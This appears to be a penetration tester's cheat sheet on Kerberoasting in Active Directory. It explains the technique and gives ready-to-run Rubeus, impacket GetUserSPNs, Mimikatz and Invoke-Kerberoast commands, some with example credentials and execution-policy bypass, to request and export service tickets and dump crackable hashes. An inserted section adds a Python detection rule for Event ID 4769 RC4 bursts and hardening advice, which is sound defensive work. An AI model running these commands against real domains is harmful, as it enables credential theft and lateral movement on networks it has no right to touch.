Kerberoasting

If an account has an SPN (Service Principal Name) set, any authenticated domain user can request a service ticket for it. That ticket is encrypted with the service account's password hash, so it can be taken offline and cracked locally.

For Kerberos to work, the clock on the machine making the request and the clock on the domain controller have to be within 5 minutes of each other (the default clock-skew tolerance); otherwise the KDC rejects the request.
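The requests described above leave a trace on the domain controller: each service-ticket request is logged as Security Event ID 4769, and a Kerberoasting run shows up as one account asking for tickets to many different SPN accounts in a short burst, usually with RC4 (etype 0x17) because that is the cheapest to crack. The following detection rule is an added example, not part of the original notes or of any of the tools listed here. The event records are constructed in the script (no real log data), the field names follow the 4769 event's XML fields (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status), and the 5-minute window and five-service threshold are assumed tuning values, not documented defaults of any product.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

# Kerberos encryption types as they appear in the TicketEncryptionType field of 4769.
ETYPE_NAMES = {"0x17": "RC4-HMAC", "0x18": "RC4-HMAC-EXP", "0x11": "AES128", "0x12": "AES256"}


class TgsRequest(NamedTuple):
    time: datetime
    account: str      # TargetUserName: the principal that asked for the ticket
    service: str      # ServiceName: the account the SPN is registered on
    etype: str        # TicketEncryptionType
    client_ip: str    # IpAddress of the requesting host
    status: str       # 0x0 = success


# Constructed sample of 4769 records, reduced to the fields the rule needs.
# (time, requesting account, service account, etype, client IP, status)
SAMPLE_4769 = [
    ("2024-05-01T09:00:01", "ecorp\\morph3", "svc_sql",    "0x17", "10.10.10.50", "0x0"),
    ("2024-05-01T09:00:02", "ecorp\\morph3", "svc_http",   "0x17", "10.10.10.50", "0x0"),
    ("2024-05-01T09:00:02", "ecorp\\morph3", "svc_mssql",  "0x17", "10.10.10.50", "0x0"),
    ("2024-05-01T09:00:03", "ecorp\\morph3", "svc_backup", "0x17", "10.10.10.50", "0x0"),
    ("2024-05-01T09:00:03", "ecorp\\morph3", "svc_exch",   "0x17", "10.10.10.50", "0x0"),
    ("2024-05-01T09:00:04", "ecorp\\morph3", "WS01$",      "0x17", "10.10.10.50", "0x0"),  # computer account: ignored
    ("2024-05-01T09:05:00", "ecorp\\alice",  "svc_sql",    "0x12", "10.10.10.60", "0x0"),  # AES, normal use
    ("2024-05-01T11:00:00", "ecorp\\alice",  "svc_http",   "0x12", "10.10.10.60", "0x0"),
    ("2024-05-01T11:30:00", "ecorp\\bob",    "svc_sql",    "0x17", "10.10.10.70", "0x0"),  # single RC4 ticket: below threshold
]


def parse_events(rows):
    """Turn the raw tuples into TgsRequest records with real timestamps."""
    return [TgsRequest(datetime.fromisoformat(t), acct, svc, et, ip, st)
            for t, acct, svc, et, ip, st in rows]


def is_roastable_request(ev: TgsRequest) -> bool:
    """Keep only successful RC4 ticket requests for user service accounts.

    Computer accounts (trailing $) and krbtgt are excluded: their tickets are
    requested constantly and their passwords are not crackable in practice."""
    if ev.status != "0x0":
        return False
    if ev.etype not in ("0x17", "0x18"):
        return False
    if ev.service.endswith("$") or ev.service.lower() == "krbtgt":
        return False
    return True


def detect_kerberoasting(events, window_minutes=5, min_services=5):
    """Alert when one (account, source IP) pair requests RC4 tickets for at least
    `min_services` distinct service accounts inside a `window_minutes` window.
    Returns one alert per offending pair, anchored at the start of the burst."""
    by_source = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_source[(ev.account, ev.client_ip)].append(ev)

    window = timedelta(minutes=window_minutes)
    alerts = []
    for (account, ip), reqs in by_source.items():
        reqs.sort(key=lambda e: e.time)
        for i, start in enumerate(reqs):
            # distinct services requested in [start, start + window]
            services = {e.service for e in reqs[i:] if e.time - start.time <= window}
            if len(services) >= min_services:
                alerts.append({
                    "account": account,
                    "client_ip": ip,
                    "window_start": start.time,
                    "etype": ETYPE_NAMES.get(start.etype, start.etype),
                    "services": sorted(services),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(parse_events(SAMPLE_4769)):
        print(f"{alert['account']} from {alert['client_ip']} at {alert['window_start']}: "
              f"{len(alert['services'])} {alert['etype']} service tickets -> {alert['services']}")
```

The rule keys on RC4 because Kerberoasting tools ask for it explicitly; the corresponding hardening is to enable AES-only on service accounts (msDS-SupportedEncryptionTypes) so that an RC4 request for them becomes an anomaly on its own, and to keep long random passwords or gMSAs on anything that carries an SPN.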

Rubeus

.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are several ways to enumerate them:

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:Password123@10.10.10.21 -dc-ip 10.10.10.21

Mimikatz

Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Invoke-Kerberoast

This PowerShell script is always my go-to. It works pretty well.

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerberoast.txt